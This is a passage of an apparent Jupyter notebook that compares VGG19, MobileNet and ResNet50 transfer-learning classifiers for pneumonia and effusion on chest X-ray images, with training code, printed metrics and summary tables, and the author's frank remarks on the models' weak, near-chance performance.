3.3.4 - ResNet50 Summary for PneumoniaThe table summarizing the ResNet50 metrics is below. Overall, the max f1-score achieved was 0.667 and the max recall was ~0.90. These were attained by the model with augmented images and trained layers. | Model | Accuracy | Precision | Recall | F1-score ||------|------|------|------|------|| ResNet50 baseline | 49.56 +/- 0.65% | 0.496 +/- 0.005 | 0.862 +/- 0.189 | 0.622 +/- 0.061 || ResNet50 baseline with training | 54.47 +/- 2.17% | 0.549 +/- 0.021 | 0.493 +/- 0.214 | 0.496 +/- 0.120 || ResNet50 augmented baseline | 49.71 +/- 1.15% | 0.487 +/- 0.022 | 0.665 +/- 0.347 | 0.517 +/- 0.183 || ResNet50 augmented with training | 55.14 +/- 1.34% | 0.530 +/- 0.008 | 0.899 +/- 0.042 | 0.667 +/- 0.013 | 3.4 - Summary of Pneumonia ImagesAs a reminder, a table of the best models from each architecture (VGG, MobileNet, and ResNet) is summarized below. Overall, each model gives similar results, with accuracies between 53-55% and recalls between 0.80 and 0.90. The best model I found (so far...) for identifying images with pneumonia is ResNet50 with 14 trained layers, though the other two models aren't far behind. The low accuracy is a concern because it means none of these models does particularly well. I believe part of the problem is that the training set has only ~1750 images, which is probably not enough to train on. Augmenting images helped a little for the ResNet model, but not enough. | Model | Accuracy | Precision | Recall | F1-score ||------|------|------|------|------|| VGG19 baseline with training | 53.75 +/- 0.43% | 0.525 +/- 0.006 | 0.800 +/- 0.105 | 0.631 +/- 0.031 || MobileNet baseline with training | 53.78 +/- 0.32% | 0.522 +/- 0.003 | 0.876 +/- 0.069 | 0.653 +/- 0.018 || ResNet50 augmented with training | 55.14 +/- 1.34% | 0.530 +/- 0.008 | 0.899 +/- 0.042 | 0.667 +/- 0.013 | 4 - Effusion 4.1 - VGG19 Model for Effusion ImagesI suspected that the pneumonia images were difficult to train on because of the low number of images in the training set. One way to test this theory is to find a pathology with more images. However, more images mean longer training times, which is why I chose effusion, the pathology with the second-largest number of images in the dataset. As a reference, there are ~14000, ~3500, and ~9200 images for the training, validation, and test sets, respectively.
###Code
# Get test images
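# (the 'no effusion' sample below is capped at the number of 'Effusion'
# images, so the resulting test set is class-balanced)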
Xtest_eff, ytest_eff = get_images(test_df[test_df['Effusion']==1],
'Effusion',
num_images = test_df[test_df['Effusion']==1].shape[0],
imageSize = imgSize)
Xtest_noteff, ytest_noteff = get_images(test_df[test_df['Effusion']==0],
'Effusion',
num_images = test_df[test_df['Effusion']==1].shape[0],
imageSize = imgSize)
X_test_eff = np.concatenate((Xtest_eff, Xtest_noteff), axis = 0)
y_test_eff = np.concatenate((ytest_eff, ytest_noteff))
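# stratified shuffle that keeps 99% of the pooled images as the final test set
# and discards the remaining 1%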
_, X_test_eff, _, y_test_eff = train_test_split(X_test_eff,
y_test_eff,
test_size=0.99,
random_state=42,
stratify = y_test_eff)
# get training images and split into validation set
Xtrain_eff, ytrain_eff = get_images(train_val_df[train_val_df['Effusion']==1],
'Effusion',
num_images = train_val_df[train_val_df['Effusion']==1].shape[0],
imageSize = imgSize)
Xtrain_noteff, ytrain_noteff = get_images(train_val_df[train_val_df['Effusion']==0],
'Effusion',
num_images = train_val_df[train_val_df['Effusion']==1].shape[0],
imageSize = imgSize)
Xtrain_eff = np.concatenate((Xtrain_eff, Xtrain_noteff), axis = 0)
ytrain_eff = np.concatenate((ytrain_eff, ytrain_noteff))
X_train_eff, X_val_eff, y_train_eff, y_val_eff = train_test_split(Xtrain_eff,
ytrain_eff,
test_size=0.2,
random_state=42,
stratify = ytrain_eff)
X_train_eff_model, X_val_eff_model, X_test_eff_model = convert_X_data(X_train_eff,
X_val_eff,
X_test_eff,
imageSize = imgSize,
num_classes = 2)
y_train_eff_model, y_val_eff_model, y_test_eff_model = convert_y_data(y_train_eff,
y_val_eff,
y_test_eff,
num_classes = 2)
###Output
_____no_output_____
###Markdown
4.1.1 - VGG Baseline for Effusion ImagesThis is the first model for the effusion pathology. Already the metrics are generally higher than those of the pneumonia baselines, possibly just because there are more images for the model to train on.
###Code
vgg_baseline_acc_eff_scores = []
vgg_baseline_pres_eff_scores = []
vgg_baseline_recall_eff_scores = []
vgg_baseline_f1_eff_scores = []
for i in range(3):
vgg_model_baseline = Sequential()
for layer in vgg_model.layers[:-1]:
vgg_model_baseline.add(layer)
vgg_model_baseline.add(Dense(num_classes, activation = 'softmax'))
# freeze layers, excluding from future training. weights are not updated.
for layer in vgg_model_baseline.layers:
layer.trainable = False
vgg_model_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
vgg_model_baseline_history = vgg_model_baseline.fit(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model, y_val_eff_model))
acc, prec, recall, f1 = get_metrics(vgg_model_baseline, X_test_eff_model, y_test_eff, verbose = True)
vgg_baseline_acc_eff_scores.append(acc)
vgg_baseline_pres_eff_scores.append(prec)
vgg_baseline_recall_eff_scores.append(recall)
vgg_baseline_f1_eff_scores.append(f1)
print('Accuracy of VGG baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_baseline_acc_eff_scores) * 100, np.std(vgg_baseline_acc_eff_scores)*100))
print('Precision of VGG baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_baseline_pres_eff_scores), np.std(vgg_baseline_pres_eff_scores)))
print('Recall of VGG baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_baseline_recall_eff_scores), np.std(vgg_baseline_recall_eff_scores)))
print('f1 score of VGG baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_baseline_f1_eff_scores), np.std(vgg_baseline_f1_eff_scores)))
###Output
Accuracy of VGG baseline model: 53.09 +/- 1.24%
Precision of VGG baseline model: 0.530 +/- 0.014
Recall of VGG baseline model: 0.574 +/- 0.054
f1 score of VGG baseline model: 0.549 +/- 0.016
###Markdown
4.1.2 - VGG19 Training Layers for Effusion ImagesAfter training the last 2 layers, the accuracy jumps to 63%, which I'm increasingly convinced is due to the larger number of images. Precision rises modestly to 0.61, while the recall and f1-score jump to 0.76 and 0.67.
###Code
print('Accuracy of baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_baseline_acc_eff_scores) * 100, np.std(vgg_baseline_acc_eff_scores)*100))
print('Precision of baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_baseline_pres_eff_scores), np.std(vgg_baseline_pres_eff_scores)))
print('Recall of baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_baseline_recall_eff_scores), np.std(vgg_baseline_recall_eff_scores)))
print('f1 score of baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_baseline_f1_eff_scores), np.std(vgg_baseline_f1_eff_scores)))
vgg_frozen_acc_eff_scores = []
vgg_frozen_pres_eff_scores = []
vgg_frozen_recall_eff_scores = []
vgg_frozen_f1_eff_scores = []
for i in range(3):
vgg_model_frozen = Sequential()
for layer in vgg_model.layers[:-1]:
vgg_model_frozen.add(layer)
vgg_model_frozen.add(Dense(num_classes, activation = 'softmax'))
# freeze layers, excluding from future training. weights are not updated.
for layer in vgg_model_frozen.layers[:-2]:
layer.trainable = False
vgg_model_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
vgg_model_frozen_history = vgg_model_frozen.fit(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model, y_val_eff_model))
acc, prec, recall, f1 = get_metrics(vgg_model_frozen, X_test_eff_model, y_test_eff, verbose = True)
vgg_frozen_acc_eff_scores.append(acc)
vgg_frozen_pres_eff_scores.append(prec)
vgg_frozen_recall_eff_scores.append(recall)
vgg_frozen_f1_eff_scores.append(f1)
print('Accuracy of VGG model while training last 2 layers: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_frozen_acc_eff_scores) * 100, np.std(vgg_frozen_acc_eff_scores)*100))
print('Precision of VGG model while training last 2 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_frozen_pres_eff_scores), np.std(vgg_frozen_pres_eff_scores)))
print('Recall of VGG model while training last 2 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_frozen_recall_eff_scores), np.std(vgg_frozen_recall_eff_scores)))
print('f1 score of VGG model while training last 2 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_frozen_f1_eff_scores), np.std(vgg_frozen_f1_eff_scores)))
###Output
Accuracy of VGG model while training last 2 layers: 63.06 +/- 1.92%
Precision of VGG model while training last 2 layers: 0.610 +/- 0.033
Recall of VGG model while training last 2 layers: 0.764 +/- 0.109
f1 score of VGG model while training last 2 layers: 0.672 +/- 0.019
###Markdown
4.1.3 - Adding Augmented Images to VGG19 Effusion ImagesNot much change in accuracy and precision compared to the baseline model. However, recall and f1-scores drop quite a bit, to under 0.15. The confusion matrix shows that the model tends to predict most images as 0 (no effusion), resulting in a mediocre precision and an extremely low recall, which drops the f1-score.
###Code
vgg_aug_baseline_acc_eff_scores = []
vgg_aug_baseline_pres_eff_scores = []
vgg_aug_baseline_recall_eff_scores = []
vgg_aug_baseline_f1_eff_scores = []
for i in range(3):
vgg_model_aug_baseline = Sequential()
for layer in vgg_model.layers[:-1]:
vgg_model_aug_baseline.add(layer)
vgg_model_aug_baseline.add(Dense(num_classes, activation = 'softmax'))
# freeze layers, excluding from future training. weights are not updated.
for layer in vgg_model_aug_baseline.layers:
layer.trainable = False
vgg_model_aug_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
vgg_model_aug_baseline_history = vgg_model_aug_baseline.fit_generator(gen.flow(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_eff_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model, y_val_eff_model))
acc, prec, recall, f1 = get_metrics(vgg_model_aug_baseline, X_test_eff_model, y_test_eff, verbose = True)
vgg_aug_baseline_acc_eff_scores.append(acc)
vgg_aug_baseline_pres_eff_scores.append(prec)
vgg_aug_baseline_recall_eff_scores.append(recall)
vgg_aug_baseline_f1_eff_scores.append(f1)
print('Accuracy of VGG augmented baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_aug_baseline_acc_eff_scores) * 100, np.std(vgg_aug_baseline_acc_eff_scores)*100))
print('Precision of VGG augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_baseline_pres_eff_scores), np.std(vgg_aug_baseline_pres_eff_scores)))
print('Recall of VGG augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_baseline_recall_eff_scores), np.std(vgg_aug_baseline_recall_eff_scores)))
print('f1 score of VGG augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_baseline_f1_eff_scores), np.std(vgg_aug_baseline_f1_eff_scores)))
###Output
Accuracy of VGG augmented baseline model: 50.05 +/- 0.48%
Precision of VGG augmented baseline model: 0.493 +/- 0.031
Recall of VGG augmented baseline model: 0.081 +/- 0.040
f1 score of VGG augmented baseline model: 0.135 +/- 0.059
###Markdown
Training the last layer of the augmented VGG model improves the recall, and therefore the f1-score, but both are still lower than those of the baseline model with trained layers.
###Code
vgg_aug_frozen_acc_eff_scores = []
vgg_aug_frozen_pres_eff_scores = []
vgg_aug_frozen_recall_eff_scores = []
vgg_aug_frozen_f1_eff_scores = []
for i in range(3):
vgg_model_aug_frozen = Sequential()
for layer in vgg_model.layers[:-1]:
vgg_model_aug_frozen.add(layer)
vgg_model_aug_frozen.add(Dense(num_classes, activation = 'softmax'))
# freeze layers, excluding from future training. weights are not updated.
for layer in vgg_model_aug_frozen.layers[:-1]:
layer.trainable = False
vgg_model_aug_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
vgg_model_aug_frozen_history = vgg_model_aug_frozen.fit_generator(gen.flow(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_eff_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model, y_val_eff_model))
acc, prec, recall, f1 = get_metrics(vgg_model_aug_frozen, X_test_eff_model, y_test_eff, verbose = True)
vgg_aug_frozen_acc_eff_scores.append(acc)
vgg_aug_frozen_pres_eff_scores.append(prec)
vgg_aug_frozen_recall_eff_scores.append(recall)
vgg_aug_frozen_f1_eff_scores.append(f1)
print('Accuracy of VGG augmented model while training last 1 layer: {:0.2f} +/- {:0.2f}%'.format(np.mean(vgg_aug_frozen_acc_eff_scores) * 100, np.std(vgg_aug_frozen_acc_eff_scores)*100))
print('Precision of VGG augmented model while training last 1 layer: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_frozen_pres_eff_scores), np.std(vgg_aug_frozen_pres_eff_scores)))
print('Recall of VGG augmented model while training last 1 layer: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_frozen_recall_eff_scores), np.std(vgg_aug_frozen_recall_eff_scores)))
print('f1 score of VGG augmented model while training last 1 layer: {:0.3f} +/- {:0.3f}'.format(np.mean(vgg_aug_frozen_f1_eff_scores), np.std(vgg_aug_frozen_f1_eff_scores)))
###Output
Accuracy of VGG augmented model while training last 1 layer: 50.02 +/- 1.59%
Precision of VGG augmented model while training last 1 layer: 0.493 +/- 0.021
Recall of VGG augmented model while training last 1 layer: 0.632 +/- 0.297
f1 score of VGG augmented model while training last 1 layer: 0.522 +/- 0.145
###Markdown
4.1.4 - Summary of VGG19 Model with Effusion ImagesOverall, the best VGG19 model for effusion images was the baseline model after training the last 2 layers, with an f1-score of 0.67 and a recall of 0.76. | Model | Accuracy | Precision | Recall | F1-score ||------|------|------|------|------|| VGG19 baseline | 53.09 +/- 1.24% | 0.530 +/- 0.014 | 0.574 +/- 0.054 | 0.549 +/- 0.016 || VGG19 with training | 63.06 +/- 1.92% | 0.610 +/- 0.033 | 0.764 +/- 0.109 | 0.672 +/- 0.019 || VGG19 augmented | 50.05 +/- 0.48% | 0.493 +/- 0.031 | 0.081 +/- 0.040 | 0.135 +/- 0.059 || VGG19 augmented with training | 50.02 +/- 1.59% | 0.493 +/- 0.021 | 0.632 +/- 0.297 | 0.522 +/- 0.145 | 4.2 - MobileNet Model for Effusion Images 4.2.1 - MobileNet Baseline for Effusion ImagesThe baseline model for MobileNet holds no surprises, with accuracy and precision similar to the other baselines. The recall is slightly higher at ~0.66, which lifts the f1-score relative to the other baselines.
###Code
mobilenet_baseline_acc_scores = []
mobilenet_baseline_pres_scores = []
mobilenet_baseline_recall_scores = []
mobilenet_baseline_f1_scores = []
for i in range(3):
x=mobilenet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
mobilenet_model_baseline=Model(inputs=mobilenet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in mobilenet_model_baseline.layers:
layer.trainable = False
mobilenet_model_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
mobilenet_model_baseline_history = mobilenet_model_baseline.fit(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model,
y_val_eff_model))
acc, pres, recall, f1 = get_metrics(mobilenet_model_baseline,
X_test_eff_model,
y_test_eff)
mobilenet_baseline_acc_scores.append(acc)
mobilenet_baseline_pres_scores.append(pres)
mobilenet_baseline_recall_scores.append(recall)
mobilenet_baseline_f1_scores.append(f1)
print('Accuracy of MobileNet baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(mobilenet_baseline_acc_scores) * 100, np.std(mobilenet_baseline_acc_scores)*100))
print('Precision of MobileNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_baseline_pres_scores), np.std(mobilenet_baseline_pres_scores)))
print('Recall of MobileNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_baseline_recall_scores), np.std(mobilenet_baseline_recall_scores)))
print('f1 score of MobileNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_baseline_f1_scores), np.std(mobilenet_baseline_f1_scores)))
###Output
Accuracy of MobileNet baseline model: 49.72 +/- 1.53%
Precision of MobileNet baseline model: 0.488 +/- 0.022
Recall of MobileNet baseline model: 0.655 +/- 0.324
f1 score of MobileNet baseline model: 0.519 +/- 0.172
###Markdown
4.2.2 - MobileNet Training Layers for Effusion ImagesUnfortunately, at the time of writing I am having trouble reproducing the results from my preliminary work: the run below collapses into predicting every image as positive (precision 0.500, recall 1.000), so these metrics will be excluded from the summary table.
###Code
mobilenet_frozen_acc_scores = []
mobilenet_frozen_pres_scores = []
mobilenet_frozen_recall_scores = []
mobilenet_frozen_f1_scores = []
for i in range(3):
x=mobilenet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
mobilenet_model_frozen=Model(inputs=mobilenet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in mobilenet_model_frozen.layers[:-24]:
layer.trainable = False
mobilenet_model_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
mobilenet_model_frozen_history = mobilenet_model_frozen.fit(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model,
y_val_eff_model))
acc, pres, recall, f1 = get_metrics(mobilenet_model_frozen,
X_test_eff_model,
y_test_eff)
mobilenet_frozen_acc_scores.append(acc)
mobilenet_frozen_pres_scores.append(pres)
mobilenet_frozen_recall_scores.append(recall)
mobilenet_frozen_f1_scores.append(f1)
print('Accuracy of MobileNet model while training last 24 layers: {:0.2f} +/- {:0.2f}%'.format(np.mean(mobilenet_frozen_acc_scores) * 100, np.std(mobilenet_frozen_acc_scores)*100))
print('Precision of MobileNet model while training last 24 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_frozen_pres_scores), np.std(mobilenet_frozen_pres_scores)))
print('Recall of MobileNet model while training last 24 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_frozen_recall_scores), np.std(mobilenet_frozen_recall_scores)))
print('f1 score of MobileNet model while training last 24 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_frozen_f1_scores), np.std(mobilenet_frozen_f1_scores)))
###Output
Accuracy of MobileNet model while training last 24 layers: 50.08 +/- 0.09%
Precision of MobileNet model while training last 24 layers: 0.500 +/- 0.000
Recall of MobileNet model while training last 24 layers: 1.000 +/- 0.000
f1 score of MobileNet model while training last 24 layers: 0.667 +/- 0.000
###Markdown
4.2.3 - Adding Augmented Images to MobileNet for Effusion Images
###Code
mobilenet_aug_baseline_acc_scores = []
mobilenet_aug_baseline_pres_scores = []
mobilenet_aug_baseline_recall_scores = []
mobilenet_aug_baseline_f1_scores = []
for i in range(3):
x=mobilenet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
mobilenet_model_aug_baseline=Model(inputs=mobilenet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in mobilenet_model_aug_baseline.layers:
layer.trainable = False
mobilenet_model_aug_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
mobilenet_model_aug_baseline_history = mobilenet_model_aug_baseline.fit_generator(gen.flow(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_eff_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model,
y_val_eff_model))
acc, pres, recall, f1 = get_metrics(mobilenet_model_aug_baseline,
X_test_eff_model,
y_test_eff)
mobilenet_aug_baseline_acc_scores.append(acc)
mobilenet_aug_baseline_pres_scores.append(pres)
mobilenet_aug_baseline_recall_scores.append(recall)
mobilenet_aug_baseline_f1_scores.append(f1)
print('Accuracy of MobileNet augmented baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(mobilenet_aug_baseline_acc_scores) * 100, np.std(mobilenet_aug_baseline_acc_scores)*100))
print('Precision of MobileNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_baseline_pres_scores), np.std(mobilenet_aug_baseline_pres_scores)))
print('Recall of MobileNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_baseline_recall_scores), np.std(mobilenet_aug_baseline_recall_scores)))
print('f1 score of MobileNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_baseline_f1_scores), np.std(mobilenet_aug_baseline_f1_scores)))
###Output
Accuracy of MobileNet augmented baseline model: 49.98 +/- 0.29%
Precision of MobileNet augmented baseline model: 0.455 +/- 0.065
Recall of MobileNet augmented baseline model: 0.552 +/- 0.409
f1 score of MobileNet augmented baseline model: 0.417 +/- 0.284
###Markdown
Again, I was unable to find the optimal number of layers to train (this run also collapses into all-positive predictions), so these metrics are removed from the summary.
###Code
mobilenet_aug_frozen_acc_scores = []
mobilenet_aug_frozen_pres_scores = []
mobilenet_aug_frozen_recall_scores = []
mobilenet_aug_frozen_f1_scores = []
for i in range(3):
x=mobilenet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
mobilenet_model_aug_frozen=Model(inputs=mobilenet_model.input,outputs=preds)
for layer in mobilenet_model_aug_frozen.layers[:-24]:
layer.trainable = False
mobilenet_model_aug_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
mobilenet_model_aug_frozen_history = mobilenet_model_aug_frozen.fit_generator(gen.flow(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_eff_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model,
y_val_eff_model))
acc, pres, recall, f1 = get_metrics(mobilenet_model_aug_frozen,
X_test_eff_model,
y_test_eff)
mobilenet_aug_frozen_acc_scores.append(acc)
mobilenet_aug_frozen_pres_scores.append(pres)
mobilenet_aug_frozen_recall_scores.append(recall)
mobilenet_aug_frozen_f1_scores.append(f1)
print('Accuracy of MobileNet augmented model while training last 24 layers: {:0.2f} +/- {:0.2f}%'.format(np.mean(mobilenet_aug_frozen_acc_scores) * 100, np.std(mobilenet_aug_frozen_acc_scores)*100))
print('Precision of MobileNet augmented model while training last 24 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_frozen_pres_scores), np.std(mobilenet_aug_frozen_pres_scores)))
print('Recall of MobileNet augmented model while training last 24 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_frozen_recall_scores), np.std(mobilenet_aug_frozen_recall_scores)))
print('f1 score of MobileNet augmented model while training last 24 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(mobilenet_aug_frozen_f1_scores), np.std(mobilenet_aug_frozen_f1_scores)))
###Output
Accuracy of MobileNet augmented model while training last 24 layers: 50.00 +/- 0.01%
Precision of MobileNet augmented model while training last 24 layers: 0.500 +/- 0.000
Recall of MobileNet augmented model while training last 24 layers: 1.000 +/- 0.000
f1 score of MobileNet augmented model while training last 24 layers: 0.667 +/- 0.000
###Markdown
4.2.4 - Summary of MobileNet Model with Effusion ImagesSince I was unable to optimize the number of trainable layers in this notebook, I only have the baselines of the augmented and non-augmented models. This section will have to be revisited at a later date. | Model | Accuracy | Precision | Recall | F1-score ||------|------|------|------|------|| MobileNet baseline | 49.72 +/- 1.53% | 0.488 +/- 0.022 | 0.655 +/- 0.324 | 0.519 +/- 0.172 || MobileNet augmented baseline | 49.98 +/- 0.29% | 0.455 +/- 0.065 | 0.552 +/- 0.409 | 0.417 +/- 0.284 | 4.3 - ResNet Model for Effusion Images 4.3.1 - ResNet Baseline for Effusion ImagesFinally, we reach the last architecture for effusion images. As expected, accuracy is around 50% and precision is around 0.50; the recall and f1-score are, if anything, a bit lower than the other baselines.
###Code
resnet_baseline_acc_scores = []
resnet_baseline_pres_scores = []
resnet_baseline_recall_scores = []
resnet_baseline_f1_scores = []
for i in range(3):
x=resnet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
resnet_model_baseline=Model(inputs=resnet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in resnet_model_baseline.layers:
layer.trainable = False
resnet_model_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
resnet_model_baseline_history = resnet_model_baseline.fit(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model,
y_val_eff_model))
acc, pres, recall, f1 = get_metrics(resnet_model_baseline,
X_test_eff_model,
y_test_eff)
resnet_baseline_acc_scores.append(acc)
resnet_baseline_pres_scores.append(pres)
resnet_baseline_recall_scores.append(recall)
resnet_baseline_f1_scores.append(f1)
print('Accuracy of ResNet baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(resnet_baseline_acc_scores) * 100, np.std(resnet_baseline_acc_scores)*100))
print('Precision of ResNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_baseline_pres_scores), np.std(resnet_baseline_pres_scores)))
print('Recall of ResNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_baseline_recall_scores), np.std(resnet_baseline_recall_scores)))
print('f1 score of ResNet baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_baseline_f1_scores), np.std(resnet_baseline_f1_scores)))
###Output
Accuracy of ResNet baseline model: 47.50 +/- 2.92%
Precision of ResNet baseline model: 0.460 +/- 0.047
Recall of ResNet baseline model: 0.519 +/- 0.340
f1 score of ResNet baseline model: 0.450 +/- 0.156
###Markdown
4.3.2 - ResNet Training Layers for Effusion ImagesWith the last 26 layers of the baseline ResNet model trained, the accuracy increases to ~63%, precision rises slightly to 0.59, and the recall and f1-score rise to 0.88 and 0.70.
###Code
resnet_frozen_acc_scores = []
resnet_frozen_pres_scores = []
resnet_frozen_recall_scores = []
resnet_frozen_f1_scores = []
for i in range(3):
x=resnet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
resnet_model_frozen=Model(inputs=resnet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in resnet_model_frozen.layers[:-26]:
layer.trainable = False
resnet_model_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
resnet_model_frozen_history = resnet_model_frozen.fit(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model,
y_val_eff_model))
acc, pres, recall, f1 = get_metrics(resnet_model_frozen,
X_test_eff_model,
y_test_eff)
resnet_frozen_acc_scores.append(acc)
resnet_frozen_pres_scores.append(pres)
resnet_frozen_recall_scores.append(recall)
resnet_frozen_f1_scores.append(f1)
print('Accuracy of ResNet model while training last 26 layers: {:0.2f} +/- {:0.2f}%'.format(np.mean(resnet_frozen_acc_scores) * 100, np.std(resnet_frozen_acc_scores)*100))
print('Precision of ResNet model while training last 26 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_frozen_pres_scores), np.std(resnet_frozen_pres_scores)))
print('Recall of ResNet model while training last 26 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_frozen_recall_scores), np.std(resnet_frozen_recall_scores)))
print('f1 score of ResNet model while training last 26 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_frozen_f1_scores), np.std(resnet_frozen_f1_scores)))
###Output
Accuracy of ResNet model while training last 26 layers: 62.76 +/- 0.11%
Precision of ResNet model while training last 26 layers: 0.585 +/- 0.002
Recall of ResNet model while training last 26 layers: 0.878 +/- 0.009
f1 score of ResNet model while training last 26 layers: 0.702 +/- 0.002
###Markdown
4.3.3 - Adding Augmented Images to ResNet for Effusion ImagesThe baseline model with augmented images has slightly better metrics than the baseline model without augmentation, but they are still lower than those of the baseline model with fine-tuning.
###Code
resnet_aug_baseline_acc_scores = []
resnet_aug_baseline_pres_scores = []
resnet_aug_baseline_recall_scores = []
resnet_aug_baseline_f1_scores = []
for i in range(3):
x=resnet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
resnet_model_aug_baseline=Model(inputs=resnet_model.input,outputs=preds)
# freeze layers, excluding from future training. weights are not updated.
for layer in resnet_model_aug_baseline.layers:
layer.trainable = False
resnet_model_aug_baseline.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
resnet_model_aug_baseline_history = resnet_model_aug_baseline.fit_generator(gen.flow(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_eff_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model,
y_val_eff_model))
acc, pres, recall, f1 = get_metrics(resnet_model_aug_baseline,
X_test_eff_model,
y_test_eff)
resnet_aug_baseline_acc_scores.append(acc)
resnet_aug_baseline_pres_scores.append(pres)
resnet_aug_baseline_recall_scores.append(recall)
resnet_aug_baseline_f1_scores.append(f1)
print('Accuracy of ResNet augmented baseline model: {:0.2f} +/- {:0.2f}%'.format(np.mean(resnet_aug_baseline_acc_scores) * 100, np.std(resnet_aug_baseline_acc_scores)*100))
